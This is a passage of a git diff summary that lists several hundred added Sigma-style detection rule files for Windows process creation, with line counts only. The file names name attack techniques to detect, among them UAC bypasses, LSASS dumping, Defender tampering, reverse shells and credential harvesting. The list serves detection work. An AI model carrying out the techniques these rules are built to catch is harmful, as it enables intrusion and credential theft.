.../proc_creation_win_msdt_susp_parent.yml | 43 + ...roc_creation_win_msedge_proxy_download.yml | 31 + .../proc_creation_win_mshta_http.yml | 33 + ...roc_creation_win_mshta_inline_vbscript.yml | 30 + .../proc_creation_win_mshta_javascript.yml | 30 + ...creation_win_mshta_lethalhta_technique.yml | 27 + ...reation_win_mshta_susp_child_processes.yml | 52 + ...proc_creation_win_mshta_susp_execution.yml | 45 + .../proc_creation_win_mshta_susp_pattern.yml | 58 + .../proc_creation_win_msiexec_dll.yml | 35 + .../proc_creation_win_msiexec_embedding.yml | 40 + .../proc_creation_win_msiexec_execute_dll.yml | 47 + ...roc_creation_win_msiexec_install_quiet.yml | 56 + ...oc_creation_win_msiexec_install_remote.yml | 49 + ...proc_creation_win_msiexec_masquerading.yml | 32 + .../proc_creation_win_msiexec_web_install.yml | 33 + .../proc_creation_win_msohtmed_download.yml | 33 + .../proc_creation_win_mspub_download.yml | 33 + ...reation_win_mssql_sqlps_susp_execution.yml | 37 + ...on_win_mssql_sqltoolsps_susp_execution.yml | 35 + ..._creation_win_mssql_susp_child_process.yml | 49 + ...n_win_mssql_veaam_susp_child_processes.yml | 56 + ...reation_win_mstsc_rdp_hijack_shadowing.yml | 29 + ...c_creation_win_mstsc_remote_connection.yml | 36 + ..._creation_win_mstsc_run_local_rdp_file.yml | 35 + ...mstsc_run_local_rdp_file_susp_location.yml | 43 + ...n_mstsc_run_local_rpd_file_susp_parent.yml | 43 + .../proc_creation_win_msxsl_execution.yml | 30 + ...oc_creation_win_msxsl_remote_execution.yml | 27 + ..._win_net_default_accounts_manipulation.yml | 72 + ...tion_win_net_groups_and_accounts_recon.yml | 65 + ..._win_net_network_connections_discovery.yml | 38 + ...eation_win_net_share_and_sessions_enum.yml | 40 + .../proc_creation_win_net_share_unmount.yml | 35 + .../proc_creation_win_net_start_service.yml | 33 + .../proc_creation_win_net_stop_service.yml | 33 + .../proc_creation_win_net_susp_execution.yml | 61 + ...creation_win_net_use_mount_admin_share.yml | 38 + ...ation_win_net_use_mount_internet_share.yml | 35 + .../proc_creation_win_net_use_mount_share.yml | 38 + ...reation_win_net_use_password_plaintext.yml | 43 + .../proc_creation_win_net_user_add.yml | 44 + ...creation_win_net_user_add_never_expire.yml | 39 + .../proc_creation_win_netsh_fw_add_rule.yml | 37 + ...etsh_fw_allow_program_in_susp_location.yml | 65 + .../proc_creation_win_netsh_fw_allow_rdp.yml | 39 + ...proc_creation_win_netsh_fw_delete_rule.yml | 35 + .../proc_creation_win_netsh_fw_disable.yml | 44 + ...reation_win_netsh_fw_enable_group_rule.yml | 37 + ..._creation_win_netsh_fw_rules_discovery.yml | 38 + .../proc_creation_win_netsh_fw_set_rule.yml | 32 + ...ation_win_netsh_helper_dll_persistence.yml | 41 + ...proc_creation_win_netsh_packet_capture.yml | 33 + ...roc_creation_win_netsh_port_forwarding.yml | 50 + ...reation_win_netsh_port_forwarding_3389.yml | 35 + ...n_win_netsh_wifi_credential_harvesting.yml | 35 + .../proc_creation_win_nltest_execution.yml | 33 + .../proc_creation_win_nltest_recon.yml | 55 + .../proc_creation_win_node_abuse.yml | 39 + ...on_win_node_adobe_creative_cloud_abuse.yml | 32 + ...creation_win_nslookup_domain_discovery.yml | 29 + ...eation_win_nslookup_poweshell_download.yml | 38 + .../proc_creation_win_ntdsutil_susp_usage.yml | 42 + .../proc_creation_win_ntdsutil_usage.yml | 26 + ...c_creation_win_odbcconf_driver_install.yml | 36 + ...ation_win_odbcconf_driver_install_susp.yml | 36 + ...ation_win_odbcconf_exec_susp_locations.yml | 54 + ...ation_win_odbcconf_register_dll_regsvr.yml | 39 + ..._win_odbcconf_register_dll_regsvr_susp.yml | 36 + ...oc_creation_win_odbcconf_response_file.yml | 40 + ...eation_win_odbcconf_response_file_susp.yml | 45 + ...on_win_odbcconf_uncommon_child_process.yml | 28 + ...tion_win_office_arbitrary_cli_download.yml | 43 + ...win_office_excel_dcom_lateral_movement.yml | 37 + ...win_office_exec_from_trusted_locations.yml | 54 + ...in_office_onenote_susp_child_processes.yml | 129 + ...utlook_enable_unsafe_client_mail_rules.yml | 32 + ...win_office_outlook_execution_from_temp.yml | 27 + ...in_office_outlook_susp_child_processes.yml | 70 + ...ce_outlook_susp_child_processes_remote.yml | 33 + ..._office_spawn_exe_from_users_directory.yml | 44 + ...eation_win_office_susp_child_processes.yml | 139 + ...c_creation_win_office_winword_dll_load.yml | 34 + ...flinescannershell_mpclient_sideloading.yml | 35 + ...ion_win_pdqdeploy_runner_susp_children.yml | 59 + ...tion_win_perl_inline_command_execution.yml | 29 + ...ation_win_php_inline_command_execution.yml | 30 + .../proc_creation_win_ping_hex_ip.yml | 31 + .../proc_creation_win_pktmon_execution.yml | 27 + ...proc_creation_win_plink_susp_tunneling.yml | 37 + .../proc_creation_win_powercfg_execution.yml | 38 + ...ershell_aadinternals_cmdlets_execution.yml | 61 + ...ell_active_directory_module_dll_import.yml | 44 + ..._win_powershell_add_windows_capability.yml | 38 + ...win_powershell_amsi_init_failed_bypass.yml | 37 + ...n_win_powershell_amsi_null_bits_bypass.yml | 31 + ..._creation_win_powershell_audio_capture.yml | 33 + ...tion_win_powershell_base64_encoded_cmd.yml | 48 + ...win_powershell_base64_frombase64string.yml | 33 + ...roc_creation_win_powershell_base64_iex.yml | 50 + ..._creation_win_powershell_base64_invoke.yml | 49 + ...ion_win_powershell_base64_mppreference.yml | 46 + ...rshell_base64_reflection_assembly_load.yml | 51 + ...base64_reflection_assembly_load_obfusc.yml | 59 + ...tion_win_powershell_base64_wmi_classes.yml | 80 + ..._creation_win_powershell_cl_invocation.yml | 28 + ...reation_win_powershell_cl_loadassembly.yml | 30 + ...ation_win_powershell_cl_mutexverifiers.yml | 36 + ...ershell_cmdline_convertto_securestring.yml | 36 + ...in_powershell_cmdline_reversed_strings.yml | 68 + ..._powershell_cmdline_special_characters.yml | 46 + ...hell_computer_discovery_get_adcomputer.yml | 46 + ...creation_win_powershell_create_service.yml | 32 + ...oc_creation_win_powershell_decode_gzip.yml | 27 + ...reation_win_powershell_decrypt_pattern.yml | 54 + ...in_powershell_defender_disable_feature.yml | 90 + ...tion_win_powershell_defender_exclusion.yml | 40 + ...isable_defender_av_security_monitoring.yml | 53 + ...eation_win_powershell_disable_firewall.yml | 46 + ...ion_win_powershell_disable_ie_features.yml | 36 + ..._creation_win_powershell_dll_execution.yml | 44 + ...eation_win_powershell_downgrade_attack.yml | 39 + ...on_win_powershell_download_com_cradles.yml | 41 + ...eation_win_powershell_download_cradles.yml | 32 + ...c_creation_win_powershell_download_dll.yml | 33 + ...c_creation_win_powershell_download_iex.yml | 43 + ...ation_win_powershell_download_patterns.yml | 43 + ...oc_creation_win_powershell_email_exfil.yml | 34 + ...l_enable_susp_windows_optional_feature.yml | 43 + .../proc_creation_win_powershell_encode.yml | 42 + ...on_win_powershell_encoded_cmd_patterns.yml | 50 + ...creation_win_powershell_encoded_obfusc.yml | 57 + ...ation_win_powershell_encoding_patterns.yml | 57 + ...creation_win_powershell_exec_data_file.yml | 36 + ...tion_win_powershell_export_certificate.yml | 34 + ...eation_win_powershell_frombase64string.yml | 28 + ...in_powershell_frombase64string_archive.yml | 31 + ..._creation_win_powershell_get_clipboard.yml | 30 + ...powershell_get_localgroup_member_recon.yml | 43 + ...eation_win_powershell_getprocess_lsass.yml | 30 + ...creation_win_powershell_hidden_b64_cmd.yml | 83 + ...wershell_hide_services_via_set_service.yml | 43 + ...c_creation_win_powershell_iex_patterns.yml | 46 + ..._powershell_import_cert_susp_locations.yml | 37 + ...win_powershell_import_module_susp_dirs.yml | 43 + ...ershell_install_unsigned_appx_packages.yml | 40 + ...ion_win_powershell_invocation_specific.yml | 75 + ...powershell_invoke_webrequest_direct_ip.yml | 49 + ..._powershell_invoke_webrequest_download.yml | 56 + ...ion_win_powershell_mailboxexport_share.yml | 34 + ...ation_win_powershell_malicious_cmdlets.yml | 247 + ..._powershell_msexchange_transport_agent.yml | 31 + ...n_powershell_non_interactive_execution.yml | 45 + ...on_win_powershell_obfuscation_via_utf8.yml | 28 + ..._creation_win_powershell_public_folder.yml | 43 + ...wershell_remotefxvgpudisablement_abuse.yml | 36 + ...in_powershell_reverse_shell_connection.yml | 38 + ...ion_win_powershell_run_script_from_ads.yml | 34 + ...owershell_run_script_from_input_stream.yml | 31 + ...roc_creation_win_powershell_sam_access.yml | 36 + ...on_win_powershell_script_engine_parent.yml | 34 + ..._service_dacl_modification_set_service.yml | 44 + .../proc_creation_win_powershell_set_acl.yml | 42 + ...n_win_powershell_set_acl_susp_location.yml | 53 + ...ershell_set_policies_to_unsecure_level.yml | 50 + ...on_win_powershell_set_service_disabled.yml | 34 + ...ion_win_powershell_shadowcopy_deletion.yml | 45 + ...reation_win_powershell_snapins_hafnium.yml | 45 + ...c_creation_win_powershell_stop_service.yml | 33 + ...on_win_powershell_susp_child_processes.yml | 48 + ..._win_powershell_susp_download_patterns.yml | 36 + ...in_powershell_susp_parameter_variation.yml | 137 + ...ion_win_powershell_susp_parent_process.yml | 65 + ...reation_win_powershell_susp_ps_appdata.yml | 38 + ...on_win_powershell_susp_ps_downloadfile.yml | 32 + ...ll_tamper_defender_remove_mppreference.yml | 34 + ...ation_win_powershell_token_obfuscation.yml | 37 + ...n_powershell_user_discovery_get_aduser.yml | 45 + ...eation_win_powershell_webclient_casing.yml | 178 + ...creation_win_powershell_x509enrollment.yml | 32 + ...reation_win_powershell_xor_commandline.yml | 55 + ...c_creation_win_powershell_zip_compress.yml | 39 + ...creation_win_presentationhost_download.yml | 33 + ...resentationhost_uncommon_location_exec.yml | 35 + ...ation_win_pressanykey_lolbin_execution.yml | 31 + ...oc_creation_win_print_remote_file_copy.yml | 33 + ..._creation_win_protocolhandler_download.yml | 34 + ...reation_win_provlaunch_potential_abuse.yml | 54 + ...tion_win_provlaunch_susp_child_process.yml | 53 + ...c_creation_win_psr_capture_screenshots.yml | 31 + ...proc_creation_win_pua_3proxy_execution.yml | 31 + ...oc_creation_win_pua_adfind_enumeration.yml | 43 + ...roc_creation_win_pua_adfind_susp_usage.yml | 60 + ...c_creation_win_pua_advanced_ip_scanner.yml | 38 + ...creation_win_pua_advanced_port_scanner.yml | 34 + ...creation_win_pua_advancedrun_priv_user.yml | 46 + .../proc_creation_win_pua_chisel.yml | 43 + .../proc_creation_win_pua_cleanwipe.yml | 37 + .../proc_creation_win_pua_crassus.yml | 27 + .../proc_creation_win_pua_csexec.yml | 31 + .../proc_creation_win_pua_defendercheck.yml | 27 + .../proc_creation_win_pua_ditsnap.yml | 28 + .../proc_creation_win_pua_frp.yml | 40 + .../proc_creation_win_pua_iox.yml | 41 + .../proc_creation_win_pua_netcat.yml | 45 + .../proc_creation_win_pua_ngrok.yml | 56 + .../proc_creation_win_pua_nimgrab.yml | 35 + .../proc_creation_win_pua_nircmd.yml | 47 + ...proc_creation_win_pua_nircmd_as_system.yml | 32 + .../proc_creation_win_pua_nmap_zenmap.yml | 32 + .../proc_creation_win_pua_nps.yml | 42 + .../proc_creation_win_pua_nsudo.yml | 52 + .../proc_creation_win_pua_pingcastle.yml | 189 + ...ation_win_pua_pingcastle_script_parent.yml | 94 + .../proc_creation_win_pua_process_hacker.yml | 67 + ...proc_creation_win_pua_rcedit_execution.yml | 45 + ...proc_creation_win_pua_rclone_execution.yml | 63 + .../proc_creation_win_pua_runxcmd.yml | 35 + .../proc_creation_win_pua_seatbelt.yml | 60 + .../proc_creation_win_pua_system_informer.yml | 49 + ...oc_creation_win_pua_webbrowserpassview.yml | 27 + ..._creation_win_pua_wsudo_susp_execution.yml | 37 + .../proc_creation_win_python_adidnsdump.yml | 29 + ...on_win_python_inline_command_execution.yml | 40 + .../proc_creation_win_python_pty_spawn.yml | 37 + .../proc_creation_win_query_session_exfil.yml | 28 + .../proc_creation_win_rar_compress_data.yml | 28 + ...tion_win_rar_compression_with_password.yml | 33 + ...eation_win_rar_susp_greedy_compression.yml | 46 + .../proc_creation_win_rasdial_execution.yml | 27 + ...eation_win_rdrleakdiag_process_dumping.yml | 46 + .../proc_creation_win_reg_add_run_key.yml | 32 + .../proc_creation_win_reg_add_safeboot.yml | 35 + .../proc_creation_win_reg_bitlocker.yml | 40 + ..._credential_access_via_password_filter.yml | 30 + ...oc_creation_win_reg_defender_exclusion.yml | 37 + .../proc_creation_win_reg_delete_safeboot.yml | 34 + .../proc_creation_win_reg_delete_services.yml | 32 + ...tion_win_reg_desktop_background_change.yml | 58 + ...direct_asep_registry_keys_modification.yml | 40 + ..._creation_win_reg_disable_sec_services.yml | 49 + ...eation_win_reg_dumping_sensitive_hives.yml | 63 + ...numeration_for_credentials_in_registry.yml | 42 + ...n_win_reg_import_from_suspicious_paths.yml | 41 + ...n_win_reg_lsa_disable_restricted_admin.yml | 35 + ...on_win_reg_lsa_ppl_protection_disabled.yml | 33 + .../proc_creation_win_reg_machineguid.yml | 29 + ...n_win_reg_modify_group_policy_settings.yml | 40 + .../proc_creation_win_reg_nolmhash.yml | 36 + .../proc_creation_win_reg_open_command.yml | 43 + .../proc_creation_win_reg_query_registry.yml | 38 + .../proc_creation_win_reg_rdp_keys_tamper.yml | 52 + .../proc_creation_win_reg_screensaver.yml | 57 + ...ation_win_reg_service_imagepath_change.yml | 37 + ...oc_creation_win_reg_software_discovery.yml | 35 + .../proc_creation_win_reg_susp_paths.yml | 39 + .../proc_creation_win_reg_volsnap_disable.yml | 28 + ...eation_win_reg_windows_defender_tamper.yml | 69 + ...reg_write_protect_for_storage_disabled.yml | 30 + ...m_regsvcs_uncommon_extension_execution.yml | 44 + ...sm_regsvcs_uncommon_location_execution.yml | 46 + ...ation_win_regedit_export_critical_keys.yml | 47 + .../proc_creation_win_regedit_export_keys.yml | 47 + .../proc_creation_win_regedit_import_keys.yml | 50 + ...c_creation_win_regedit_import_keys_ads.yml | 47 + ..._creation_win_regedit_trustedinstaller.yml | 29 + .../proc_creation_win_regini_ads.yml | 37 + .../proc_creation_win_regini_execution.yml | 37 + ...tion_win_registry_cimprovider_dll_load.yml | 32 + ...gistry_enumeration_for_credentials_cli.yml | 48 + ...urity_zone_protocol_defaults_downgrade.yml | 35 + ...registry_install_reg_debugger_backdoor.yml | 38 + ...roc_creation_win_registry_logon_script.yml | 29 + ...tion_win_registry_new_network_provider.yml | 38 + ...y_privilege_escalation_via_service_key.yml | 34 + ...gistry_provlaunch_provisioning_command.yml | 33 + ...egistry_set_unsecure_powershell_policy.yml | 38 + ...n_win_registry_typed_paths_persistence.yml | 25 + ...oc_creation_win_regsvr32_flags_anomaly.yml | 33 + ..._creation_win_regsvr32_http_ip_pattern.yml | 67 + ..._creation_win_regsvr32_network_pattern.yml | 40 + ...roc_creation_win_regsvr32_remote_share.yml | 29 + ...eation_win_regsvr32_susp_child_process.yml | 49 + ...creation_win_regsvr32_susp_exec_path_1.yml | 38 + ...creation_win_regsvr32_susp_exec_path_2.yml | 67 + ..._creation_win_regsvr32_susp_extensions.yml | 56 + ...proc_creation_win_regsvr32_susp_parent.yml | 41 + ...eation_win_regsvr32_uncommon_extension.yml | 43 + ...eation_win_remote_access_tools_anydesk.yml | 35 + ...s_tools_anydesk_piped_password_via_cli.yml | 31 + ...te_access_tools_anydesk_silent_install.yml | 34 + ..._remote_access_tools_anydesk_susp_exec.yml | 40 + ...mote_access_tools_netsupport_susp_exec.yml | 33 + ...ccess_tools_rurat_non_default_location.yml | 32 + ...mote_access_tools_screenconnect_access.yml | 31 + ...ote_access_tools_screenconnect_anomaly.yml | 31 + ...access_tools_screenconnect_remote_exec.yml | 32 + ...roc_creation_win_remote_time_discovery.yml | 33 + .../proc_creation_win_renamed_adfind.yml | 64 + .../proc_creation_win_renamed_autoit.yml | 52 + .../proc_creation_win_renamed_browsercore.yml | 28 + .../proc_creation_win_renamed_cloudflared.yml | 92 + .../proc_creation_win_renamed_createdump.yml | 42 + .../proc_creation_win_renamed_curl.yml | 31 + .../proc_creation_win_renamed_gpg4win.yml | 27 + ...oc_creation_win_renamed_netsupport_rat.yml | 30 + ..._creation_win_renamed_office_processes.yml | 53 + .../proc_creation_win_renamed_paexec.yml | 47 + .../proc_creation_win_renamed_pingcastle.yml | 60 + .../proc_creation_win_renamed_pressanykey.yml | 32 + ...win_renamed_rundll32_dllregisterserver.yml | 31 + ...tion_win_renamed_sysinternals_procdump.yml | 42 + .../proc_creation_win_renamed_vmnat.yml | 28 + ...reation_win_rpcping_credential_capture.yml | 46 + ...tion_win_ruby_inline_command_execution.yml | 29 + ..._win_rundll32_ads_stored_dll_execution.yml | 32 + ...ndll32_advpack_obfuscated_ordinal_call.yml | 34 + .../proc_creation_win_rundll32_by_ordinal.yml | 51 + .../proc_creation_win_rundll32_inline_vbs.yml | 30 + ...eation_win_rundll32_installscreensaver.yml | 30 + ...ion_win_rundll32_js_runhtmlapplication.yml | 29 + .../proc_creation_win_rundll32_keymgr.yml | 31 + ...win_rundll32_mshtml_runhtmlapplication.yml | 30 + .../proc_creation_win_rundll32_no_params.yml | 34 + .../proc_creation_win_rundll32_ntlmrelay.yml | 37 + ...n_win_rundll32_obfuscated_ordinal_call.yml | 30 + ..._creation_win_rundll32_parent_explorer.yml | 32 + ..._win_rundll32_process_dump_via_comsvcs.yml | 59 + ...on_win_rundll32_registered_com_objects.yml | 36 + ...oc_creation_win_rundll32_run_locations.yml | 38 + .../proc_creation_win_rundll32_script_run.yml | 35 + ...on_win_rundll32_shell32_susp_execution.yml | 40 + ...rundll32_shelldispatch_potential_abuse.yml | 28 + ...oc_creation_win_rundll32_susp_activity.yml | 111 + ...ion_win_rundll32_susp_control_dll_load.yml | 35 + ...32_susp_execution_with_image_extension.yml | 45 + ..._win_rundll32_susp_shellexec_execution.yml | 42 + ...tion_win_rundll32_susp_shimcache_flush.yml | 43 + .../proc_creation_win_rundll32_sys.yml | 30 + .../proc_creation_win_rundll32_unc_path.yml | 31 + ...on_win_rundll32_uncommon_dll_extension.yml | 43 + .../proc_creation_win_rundll32_user32_dll.yml | 35 + ...n_win_rundll32_webdav_client_execution.yml | 34 + ..._rundll32_webdav_client_susp_execution.yml | 58 + ...eation_win_rundll32_without_parameters.yml | 37 + .../proc_creation_win_runonce_execution.yml | 32 + ..._change_sevice_image_path_by_non_admin.yml | 38 + .../proc_creation_win_sc_create_service.yml | 33 + .../proc_creation_win_sc_disable_service.yml | 35 + ...proc_creation_win_sc_new_kernel_driver.yml | 34 + .../proc_creation_win_sc_query.yml | 30 + ...ion_win_sc_sdset_allow_service_changes.yml | 42 + ...ation_win_sc_sdset_deny_service_access.yml | 45 + ...roc_creation_win_sc_sdset_hide_sevices.yml | 47 + ...roc_creation_win_sc_sdset_modification.yml | 39 + ...ation_win_sc_service_path_modification.yml | 57 + ..._win_sc_service_tamper_for_persistence.yml | 59 + .../proc_creation_win_sc_stop_service.yml | 36 + ...tion_win_schtasks_appdata_local_system.yml | 44 + .../proc_creation_win_schtasks_change.yml | 76 + .../proc_creation_win_schtasks_creation.yml | 38 + ...tion_win_schtasks_creation_temp_folder.yml | 35 + .../proc_creation_win_schtasks_delete.yml | 42 + .../proc_creation_win_schtasks_delete_all.yml | 29 + .../proc_creation_win_schtasks_disable.yml | 44 + .../proc_creation_win_schtasks_env_folder.yml | 77 + ...oc_creation_win_schtasks_folder_combos.yml | 43 + ...c_creation_win_schtasks_guid_task_name.yml | 39 + ...n_schtasks_one_time_only_midnight_task.yml | 43 + .../proc_creation_win_schtasks_parent.yml | 36 + ...schtasks_persistence_windows_telemetry.yml | 36 + .../proc_creation_win_schtasks_reg_loader.yml | 48 + ...eation_win_schtasks_reg_loader_encoded.yml | 46 + ...oc_creation_win_schtasks_schedule_type.yml | 42 + ...tion_win_schtasks_schedule_type_system.yml | 41 + ...asks_schedule_via_masqueraded_xml_file.yml | 54 + ...roc_creation_win_schtasks_susp_pattern.yml | 67 + .../proc_creation_win_schtasks_system.yml | 52 + ...reation_win_scrcons_susp_child_process.yml | 43 + ..._creation_win_sdbinst_shim_persistence.yml | 41 + ...oc_creation_win_sdbinst_susp_extension.yml | 48 + .../proc_creation_win_sdclt_child_process.yml | 27 + ...roc_creation_win_sdiagnhost_susp_child.yml | 43 + .../proc_creation_win_secedit_execution.yml | 55 + ..._creation_win_servu_susp_child_process.yml | 43 + ...oc_creation_win_setspn_spn_enumeration.yml | 35 + .../proc_creation_win_shutdown_execution.yml | 29 + .../proc_creation_win_shutdown_logoff.yml | 27 + ...eation_win_sndvol_susp_child_processes.yml | 27 + ...eation_win_soundrecorder_audio_capture.yml | 28 + ...proc_creation_win_splwow64_cli_anomaly.yml | 27 + ...ation_win_spoolsv_susp_child_processes.yml | 87 + ...roc_creation_win_sqlcmd_veeam_db_recon.yml | 37 + .../proc_creation_win_sqlcmd_veeam_dump.yml | 32 + ...ation_win_sqlite_chromium_profile_data.yml | 45 + ..._win_sqlite_firefox_gecko_profile_data.yml | 36 + .../proc_creation_win_squirrel_download.yml | 44 + ..._creation_win_squirrel_proxy_execution.yml | 72 + .../proc_creation_win_ssh_port_forward.yml | 32 + .../proc_creation_win_ssh_rdp_tunneling.yml | 30 + .../proc_creation_win_ssm_agent_abuse.yml | 33 + ...eation_win_stordiag_susp_child_process.yml | 35 + ...oc_creation_win_susp_16bit_application.yml | 30 + ...ation_win_susp_abusing_debug_privilege.yml | 55 + ...on_win_susp_add_user_local_admin_group.yml | 40 + ...win_susp_add_user_remote_desktop_group.yml | 45 + ...eation_win_susp_alternate_data_streams.yml | 48 + ...ays_install_elevated_windows_installer.yml | 55 + .../proc_creation_win_susp_appx_execution.yml | 51 + ...ary_shell_execution_via_settingcontent.yml | 34 + ...reation_win_susp_archiver_iso_phishing.yml | 33 + ...creation_win_susp_automated_collection.yml | 48 + ...n_susp_bad_opsec_sacrificial_processes.yml | 64 + ...tion_win_susp_child_process_as_system_.yml | 46 + ...n_win_susp_cli_obfuscation_escape_char.yml | 33 + ...ation_win_susp_cli_obfuscation_unicode.yml | 52 + ...usp_commandline_path_traversal_evasion.yml | 38 + ...oc_creation_win_susp_copy_browser_data.yml | 73 + ...reation_win_susp_copy_lateral_movement.yml | 64 + ...proc_creation_win_susp_copy_system_dir.yml | 57 + ...eation_win_susp_copy_system_dir_lolbin.yml | 64 + ...creation_win_susp_crypto_mining_monero.yml | 50 + ...ion_win_susp_data_exfiltration_via_cli.yml | 71 + ...proc_creation_win_susp_disable_raccine.yml | 38 + ...roc_creation_win_susp_double_extension.yml | 71 + ...ation_win_susp_double_extension_parent.yml | 67 + ...eation_win_susp_download_office_domain.yml | 42 + ...reation_win_susp_dumpstack_log_evasion.yml | 27 + ...on_win_susp_elavated_msi_spawned_shell.yml | 41 + ...reation_win_susp_electron_app_children.yml | 98 + ...tion_win_susp_electron_exeuction_proxy.yml | 65 + ..._elevated_system_shell_uncommon_parent.yml | 73 + .../proc_creation_win_susp_embed_exe_lnk.yml | 29 + ...tion_win_susp_etw_modification_cmdline.yml | 37 + ...oc_creation_win_susp_etw_trace_evasion.yml | 57 + .../proc_creation_win_susp_eventlog_clear.yml | 63 + ...eation_win_susp_eventlog_content_recon.yml | 84 + ..._susp_execution_from_guid_folder_names.yml | 45 + ...execution_from_public_folder_as_parent.yml | 45 + .../proc_creation_win_susp_execution_path.yml | 56 + ...tion_win_susp_execution_path_webserver.yml | 37 + ...win_susp_gather_network_info_execution.yml | 37 + ...n_win_susp_hidden_dir_index_allocation.yml | 34 + ...in_susp_hiding_malware_in_fonts_folder.yml | 56 + ...win_susp_homoglyph_cyrillic_lookalikes.yml | 81 + .../proc_creation_win_susp_image_missing.yml | 41 + ...ation_win_susp_inline_base64_mz_header.yml | 29 + ...reation_win_susp_inline_win_api_access.yml | 79 + ...p_local_system_owner_account_discovery.yml | 62 + ..._win_susp_lolbin_exec_from_non_c_drive.yml | 56 + ...eation_win_susp_lsass_dmp_cli_keywords.yml | 53 + ...tion_win_susp_ms_appinstaller_download.yml | 33 + ...proc_creation_win_susp_network_command.yml | 32 + ...oc_creation_win_susp_network_scan_loop.yml | 35 + ...roc_creation_win_susp_network_sniffing.yml | 33 + .../proc_creation_win_susp_non_exe_image.yml | 84 + ...c_creation_win_susp_non_priv_reg_or_ps.yml | 47 + .../proc_creation_win_susp_ntds.yml | 76 + ...creation_win_susp_nteventlogfile_usage.yml | 38 + ..._win_susp_ntfs_short_name_path_use_cli.yml | 49 + ...in_susp_ntfs_short_name_path_use_image.yml | 50 + ...ation_win_susp_ntfs_short_name_use_cli.yml | 54 + ...ion_win_susp_ntfs_short_name_use_image.yml | 61 + ...eation_win_susp_obfuscated_ip_download.yml | 58 + ...reation_win_susp_obfuscated_ip_via_cli.yml | 53 + ..._creation_win_susp_office_token_search.yml | 29 + .../proc_creation_win_susp_parents.yml | 48 + ...in_susp_priv_escalation_via_named_pipe.yml | 39 + ...c_creation_win_susp_private_keys_recon.yml | 53 + ...susp_privilege_escalation_cli_patterns.yml | 42 + ...oc_creation_win_susp_proc_wrong_parent.yml | 53 + .../proc_creation_win_susp_progname.yml | 73 + .../proc_creation_win_susp_recon.yml | 41 + ...on_win_susp_recycle_bin_fake_execution.yml | 33 + ...on_win_susp_redirect_local_admin_share.yml | 31 + ...tion_win_susp_remote_desktop_tunneling.yml | 32 + ...eation_win_susp_right_to_left_override.yml | 29 + ...n_win_susp_script_exec_from_env_folder.yml | 62 + ...reation_win_susp_script_exec_from_temp.yml | 46 + ...roc_creation_win_susp_service_creation.yml | 59 + .../proc_creation_win_susp_service_dir.yml | 40 + .../proc_creation_win_susp_service_tamper.yml | 244 + ...eation_win_susp_shadow_copies_creation.yml | 42 + ...eation_win_susp_shadow_copies_deletion.yml | 73 + ...tion_win_susp_shell_spawn_susp_program.yml | 74 + .../proc_creation_win_susp_sysnative.yml | 28 + ...c_creation_win_susp_system_exe_anomaly.yml | 96 + ..._creation_win_susp_system_user_anomaly.yml | 102 + .../proc_creation_win_susp_sysvol_access.yml | 29 + ..._creation_win_susp_task_folder_evasion.yml | 43 + .../proc_creation_win_susp_use_of_te_bin.yml | 31 + ...tion_win_susp_use_of_vsjitdebugger_bin.yml | 35 + .../proc_creation_win_susp_userinit_child.yml | 34 + ...tion_win_susp_weak_or_abused_passwords.yml | 35 + ...n_win_susp_web_request_cmd_and_cmdlets.yml | 45 + ...proc_creation_win_susp_whoami_as_param.yml | 27 + .../proc_creation_win_susp_workfolders.yml | 29 + ...in_svchost_execution_with_no_cli_flags.yml | 36 + ...eation_win_svchost_termserv_proc_spawn.yml | 39 + ...on_win_svchost_uncommon_parent_process.yml | 38 + ...sinternals_accesschk_check_permissions.yml | 45 + ..._win_sysinternals_adexplorer_execution.yml | 32 + ...sysinternals_adexplorer_susp_execution.yml | 39 + ...reation_win_sysinternals_eula_accepted.yml | 32 + ...tion_win_sysinternals_livekd_execution.yml | 27 + ...sysinternals_livekd_kernel_memory_dump.yml | 33 + ...roc_creation_win_sysinternals_procdump.yml | 29 + ...tion_win_sysinternals_procdump_evasion.yml | 41 + ...eation_win_sysinternals_procdump_lsass.yml | 36 + ...tion_win_sysinternals_psexec_execution.yml | 28 + ...nternals_psexec_paexec_escalate_system.yml | 73 + ...n_sysinternals_psexec_remote_execution.yml | 32 + ...roc_creation_win_sysinternals_psexesvc.yml | 30 + ...on_win_sysinternals_psexesvc_as_system.yml | 31 + ...oc_creation_win_sysinternals_psloglist.yml | 52 + ...oc_creation_win_sysinternals_psservice.yml | 30 + ...n_win_sysinternals_pssuspend_execution.yml | 33 + ..._sysinternals_pssuspend_susp_execution.yml | 35 + ..._sysinternals_susp_psexec_paexec_flags.yml | 75 + ..._win_sysinternals_sysmon_config_update.yml | 32 + ...tion_win_sysinternals_sysmon_uninstall.yml | 33 + ...on_win_sysinternals_tools_masquerading.yml | 179 + .../proc_creation_win_sysprep_appdata.yml | 28 + ...proc_creation_win_systeminfo_execution.yml | 28 + ...ettingsadminflows_turn_on_dev_features.yml | 35 + ...roc_creation_win_takeown_recursive_own.yml | 34 + ...proc_creation_win_tapinstall_execution.yml | 32 + .../proc_creation_win_tar_compression.yml | 37 + .../proc_creation_win_tar_extraction.yml | 34 + .../proc_creation_win_taskkill_sep.yml | 34 + ..._creation_win_tasklist_basic_execution.yml | 28 + .../proc_creation_win_taskmgr_localsystem.yml | 27 + ...reation_win_taskmgr_susp_child_process.yml | 33 + ...ms_suspicious_command_line_cred_access.yml | 33 + ...on_win_tpmvscmgr_add_virtual_smartcard.yml | 27 + .../proc_creation_win_tscon_localsystem.yml | 31 + .../proc_creation_win_tscon_rdp_redirect.yml | 30 + ...eation_win_tscon_rdp_session_hijacking.yml | 27 + ..._creation_win_uac_bypass_changepk_slui.yml | 33 + .../proc_creation_win_uac_bypass_cmstp.yml | 43 + ...eation_win_uac_bypass_computerdefaults.yml | 34 + ...eation_win_uac_bypass_consent_comctl32.yml | 31 + .../proc_creation_win_uac_bypass_dismhost.yml | 33 + ...on_win_uac_bypass_eventvwr_recentviews.yml | 34 + ...proc_creation_win_uac_bypass_fodhelper.yml | 31 + .../proc_creation_win_uac_bypass_ieinstal.yml | 32 + ...c_creation_win_uac_bypass_msconfig_gui.yml | 31 + ...tion_win_uac_bypass_ntfs_reparse_point.yml | 41 + ...oc_creation_win_uac_bypass_pkgmgr_dism.yml | 31 + .../proc_creation_win_uac_bypass_sdclt.yml | 29 + ...oc_creation_win_uac_bypass_trustedpath.yml | 27 + .../proc_creation_win_uac_bypass_wmp.yml | 36 + .../proc_creation_win_uac_bypass_wsreset.yml | 36 + ...win_uac_bypass_wsreset_integrity_level.yml | 32 + ...c_creation_win_ultravnc_susp_execution.yml | 33 + ...ation_win_uninstall_crowdstrike_falcon.yml | 29 + ..._win_userinit_uncommon_child_processes.yml | 55 